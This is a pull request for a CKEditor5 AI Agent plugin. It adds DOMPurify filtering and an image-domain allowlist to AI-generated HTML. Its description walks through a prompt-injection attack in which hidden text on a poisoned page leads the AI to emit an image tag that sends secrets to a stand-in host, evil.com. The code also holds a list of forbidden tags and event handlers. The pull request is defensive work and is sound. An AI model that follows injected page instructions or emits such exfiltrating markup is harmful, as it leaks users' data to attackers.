### PR TITLE
Add AI output security filtering to prevent data exfiltration

### DIFF
--- a/package.json
+++ b/package.json
@@ -53,6 +53,7 @@
     "@ckeditor/ckeditor5-inspector": ">=5.0.0",
     "@ckeditor/ckeditor5-package-tools": "^4.0.2",
     "@types/chai": "^5.2.2",
+    "@types/dompurify": "^3.0.5",
     "@types/mocha": "^10.0.10",
     "@types/sbd": "^1.0.5",
     "@types/sinon": "^17.0.4",
@@ -110,6 +111,7 @@
   "dependencies": {
     "@ckeditor/ckeditor5-core": "^46.0.0",
     "@ckeditor/ckeditor5-utils": "^46.0.0",
+    "dompurify": "^3.3.0",
     "http-status-message": "^1.2.4",
     "multi-llm-ts": "^4.2.2",
     "sbd": "^1.0.19"

--- a/src/aiagentservice.ts
+++ b/src/aiagentservice.ts
@@ -54,10 +54,10 @@ export default class AiAgentService {
 	 */
 	constructor( editor: Editor ) {
 		this.editor = editor;
+		const config = editor.config.get( 'aiAgent' )!;
 		this.promptHelper = new PromptHelper( editor );
 		this.htmlParser = new HtmlParser( editor );
-		this.processContentHelper = new ProcessContentHelper( editor );
-		const config = editor.config.get( 'aiAgent' )!;
+		this.processContentHelper = new ProcessContentHelper( editor, config.aiOutputSecurity );
 
 		this.aiModel = config.model!;
 		this.apiKey = config.apiKey;

--- a/src/type-identifiers.ts
+++ b/src/type-identifiers.ts
@@ -64,6 +64,13 @@ export interface AiAgentConfig {
     moderationEnable?: boolean;
     moderationDisableFlags?: Array<ModerationFlagsTypes>;
 
+    // Security Settings
+    aiOutputSecurity?: {
+        allowedDomains?: string[];
+        strictMode?: boolean;
+        alwaysAllowedDomains?: string[];
+    };
+
     commandsDropdown?: Array<{
         title: string;
         items: Array<{

--- a/src/util/ai-output-filter.ts
+++ b/src/util/ai-output-filter.ts
@@ -1,0 +1,145 @@
+import DOMPurify from 'dompurify';
+
+export interface AiOutputSecurityConfig {
+	allowedDomains?: string[];
+	strictMode?: boolean;
+	alwaysAllowedDomains?: string[];
+}
+
+const DEFAULT_CONFIG: Required<AiOutputSecurityConfig> = {
+	allowedDomains: [
+		'unsplash.com',
+		'pexels.com',
+		'pixabay.com',
+		'githubusercontent.com',
+		'github.com'
+	],
+	strictMode: false,
+	alwaysAllowedDomains: [ 'promptahuman.com' ]
+};
+
+export class AiOutputFilter {
+	private config: Required<AiOutputSecurityConfig>;
+
+	constructor( config: AiOutputSecurityConfig = {} ) {
+		this.config = {
+			...DEFAULT_CONFIG,
+			...config,
+			allowedDomains: config.allowedDomains || DEFAULT_CONFIG.allowedDomains,
+			alwaysAllowedDomains: config.alwaysAllowedDomains || DEFAULT_CONFIG.alwaysAllowedDomains
+		};
+	}
+
+	public filter( html: string ): string {
+		const cleaned = DOMPurify.sanitize( html, {
+			ALLOWED_TAGS: [
+				'p', 'br', 'strong', 'em', 'u', 's', 'i', 'b',
+				'h1', 'h2', 'h3', 'h4', 'h5', 'h6',
+				'ul', 'ol', 'li',
+				'a', 'img',
+				'table', 'thead', 'tbody', 'tr', 'th', 'td',
+				'blockquote', 'pre', 'code',
+				'div', 'span'
+			],
+			ALLOWED_ATTR: [ 'href', 'src', 'alt', 'title', 'class', 'id' ],
+			FORBID_TAGS: [ 'iframe', 'script', 'form', 'input', 'button', 'object', 'embed' ],
+			FORBID_ATTR: [ 'onclick', 'onerror', 'onload', 'onmouseover', 'onmouseout', 'onfocus', 'onblur' ],
+			KEEP_CONTENT: true,
+			ALLOW_DATA_ATTR: false,
+			ALLOWED_URI_REGEXP: /^(?:(?:(?:f|ht)tps?|mailto|tel|callto|sms|cid|xmpp|data):|[^a-z]|[a-z+.\-]+(?:[^a-z+.\-:]|$))/i
+		} );
+
+		return this.validateUrls( cleaned );
+	}
+
+	private validateUrls( html: string ): string {
+		const div = document.createElement( 'div' );
+		div.innerHTML = html;
+
+		const images = div.querySelectorAll( 'img' );
+		images.forEach( img => {
+			const src = img.getAttribute( 'src' );
+			if ( src && !this.isUrlAllowed( src ) ) {
+				img.setAttribute( 'src', '' );
+				img.setAttribute( 'data-filtered', 'true' );
+			}
+		} );
+
+		return div.innerHTML;
+	}
+
+	private isUrlAllowed( url: string ): boolean {
+		if ( !url || url.trim() === '' ) {
+			return false;
+		}
+
+		if ( url.startsWith( '/' ) || url.startsWith( './' ) || url.startsWith( '../' ) ) {
+			return true;
+		}
+
+		if ( url.startsWith( '#' ) ) {
+			return true;
+		}
+
+		if ( url.startsWith( 'data:' ) ) {
+			return true;
+		}
+
+		if ( url.startsWith( 'mailto:' ) || url.startsWith( 'tel:' ) ) {
+			return true;
+		}
+
+		let urlObj: URL;
+		try {
+			urlObj = new URL( url );
+		} catch ( e ) {
+			return false;
+		}
+
+		const hostname = urlObj.hostname.toLowerCase();
+
+		if ( this.isDomainMatch( hostname, this.config.alwaysAllowedDomains ) ) {
+			return true;
+		}
+
+		if ( this.config.strictMode ) {
+			return false;
+		}
+
+		return this.isDomainMatch( hostname, this.config.allowedDomains );
+	}
+
+	private isDomainMatch( hostname: string, domains: string[] ): boolean {
+		for ( const domain of domains ) {
+			const domainLower = domain.toLowerCase();
+
+			if ( domainLower.startsWith( '*.' ) ) {
+				const baseDomain = domainLower.substring( 2 );
+				if ( hostname === baseDomain || hostname.endsWith( '.' + baseDomain ) ) {
+					return true;
+				}
+			} else {
+				if ( hostname === domainLower ) {
+					return true;
+				}
+			}
+		}
+
+		return false;
+	}
+
+	public updateConfig( config: Partial<AiOutputSecurityConfig> ): void {
+		this.config = {
+			...this.config,
+			...config,
+			allowedDomains: config.allowedDomains || this.config.allowedDomains,
+			alwaysAllowedDomains: config.alwaysAllowedDomains || this.config.alwaysAllowedDomains
+		};
+	}
+
+	public getConfig(): Required<AiOutputSecurityConfig> {
+		return { ...this.config };
+	}
+}
+
+export const defaultAiOutputFilter = new AiOutputFilter();

--- a/src/util/process-content.ts
+++ b/src/util/process-content.ts
@@ -1,13 +1,16 @@
 import type { Editor } from 'ckeditor5/src/core.js';
 import type { ModelElement as Element, ModelPosition as Position, ModelItem as Item } from 'ckeditor5/src/engine.js';
+import { AiOutputFilter, type AiOutputSecurityConfig } from './ai-output-filter.js';
 
 export class ProcessContentHelper {
 	private editor: Editor;
+	private securityFilter: AiOutputFilter;
 
 	private readonly FILTERED_STRINGS = /```html|```|html\n|@@@cursor@@@/g;
 
-	constructor( editor: Editor ) {
+	constructor( editor: Editor, securityConfig?: AiOutputSecurityConfig ) {
 		this.editor = editor;
+		this.securityFilter = new AiOutputFilter( securityConfig );
 	}
 
 	/**
@@ -20,8 +23,9 @@ export class ProcessContentHelper {
 	 */
 	public async updateContent( newHtml: string, blockID: string ): Promise<void> {
 		const editor = this.editor;
+		const sanitizedHtml = this.securityFilter.filter( newHtml );
 		const tempParagraph: HTMLElement = document.createElement( 'div' );
-		tempParagraph.innerHTML = newHtml;
+		tempParagraph.innerHTML = sanitizedHtml;
 		let textContent = '';
 
 		const root = editor.model.document.getRoot();
@@ -144,12 +148,13 @@ export class ProcessContentHelper {
 		editorContent = editorContent.replace( `</ai-tag>`, '' );
 		editorContent = editorContent.replace( `<ai-tag id="${ blockID }-inline">`, '' );
 		editorContent = editorContent.replace( `<ai-tag id="${ blockID }">`, '' );
+		editorContent = this.securityFilter.filter( editorContent );
 
 		editor.model.change( writer => {
 			const root = editor.model.document.getRoot();
 			if ( root ) {
 				writer.remove( editor.model.createRangeIn( root ) );
-				
+
 				const viewFragment = editor.data.processor.toView( editorContent );
 				const modelFragment = editor.data.toModel( viewFragment );
 				writer.insert( modelFragment, root, 0 );


### PR DESCRIPTION
Implement client-side filtering for AI-generated HTML to prevent prompt injection attacks that could exfiltrate sensitive data through malicious images and iframes.

## Linked issues

- Fixes #159

## Testing

**In Editor**
```shell
1. Initialize editor with AI Agent plugin
2. Generate content with AI using /write command
3. Verify that external images are filtered based on whitelist
4. Test with promptahuman.com images (should always be allowed)
5. Test strict mode (should block all external resources)
6. Verify malicious images are filtered (src replaced with empty string)
```

## Implementation Details

### Security Features

1. **Domain Whitelist for Images**
   - Default: `unsplash.com`, `pexels.com`, `pixabay.com`, `githubusercontent.com`, `github.com`
   - Configurable via `aiOutputSecurity.allowedDomains` config
   - Supports wildcard patterns (`*.cdn.com`)

2. **Iframe & Script Blocking**
   - ALL iframes, scripts, forms, inputs blocked (no legitimate use case in AI output)
   - Users add embeds manually via CKEditor UI

3. **Special Cases**
   - `promptahuman.com` always allowed (DXPR-generated placeholder images)
   - Base64 images allowed (`data:image/png;base64,...` - no network request)
   - Relative URLs, anchors, mailto, tel always allowed
   - Wildcard `*.example.com` matches parent domain too

4. **Image Filtering Behavior**
   - Disallowed images have `src` replaced with empty string
   - Image element kept with `data-filtered="true"` attribute
   - Structure preserved for user awareness

### Files Added

**New:**
- `src/util/ai-output-filter.ts` - Filtering logic with DOMPurify

**Modified:**
- `src/type-identifiers.ts` - Add aiOutputSecurity config interface
- `src/aiagentservice.ts` - Pass security config to ProcessContentHelper
- `src/util/process-content.ts` - Integrate AiOutputFilter
- `package.json` - Add dompurify dependency

### Configuration

New settings available in editor config:

```typescript
ClassicEditor.create(element, {
  aiAgent: {
    // ... existing config
    aiOutputSecurity: {
      allowedDomains: ['unsplash.com', 'pexels.com'],
      strictMode: false,
      alwaysAllowedDomains: ['promptahuman.com']
    }
  }
});
```

Settings:
- `allowedDomains` - Array of allowed domains for images (supports wildcards)
- `strictMode` - Boolean, blocks all external resources when true
- `alwaysAllowedDomains` - Array of domains allowed regardless of strictMode

### Architecture

- **Scope:** Filters AI-generated content only (not user-created content)
- **Client-side:** DOMPurify filtering before DOM rendering
- **Works with:** All AI models (OpenAI, Gemini, Anthropic, etc.)
- **Applies to:** All AI features (slash commands, content generation)

### Security Context

This addresses the vulnerability described in:
- CKEditor5 AI Agent Issue #159
- Similar to DXPR Builder PR #3968
- Drupal AI Module advisory (prompt injection via URLs)
- GitLab Duo, ChatGPT vulnerabilities

Attack scenario:
1. User asks AI to generate content
2. AI fetches attacker's SEO-poisoned page with hidden prompt injection
3. AI generates content including malicious image: `<img src="evil.com/?data=SECRETS">`
4. Browser loads image, exfiltrating data to attacker

This PR prevents step 4 by filtering malicious images before rendering.

### Default Behavior

- Uses DOMPurify for sanitization
- Whitelists common image CDNs by default
- Blocks all iframes, scripts, forms
- Blocks event handlers (onclick, onerror, etc.)
- Replaces disallowed image sources instead of removing images
- Links are NOT filtered (all links allowed)

## Checklist

- [x] My code follows the coding standards and style of this project
- [x] My code contains no changes outside the scope of the issue
- [x] New feature (non-breaking change which adds functionality)
- [x] Security enhancement to prevent data exfiltration
- [ ] Requires end-user documentation update
- [ ] All tests passing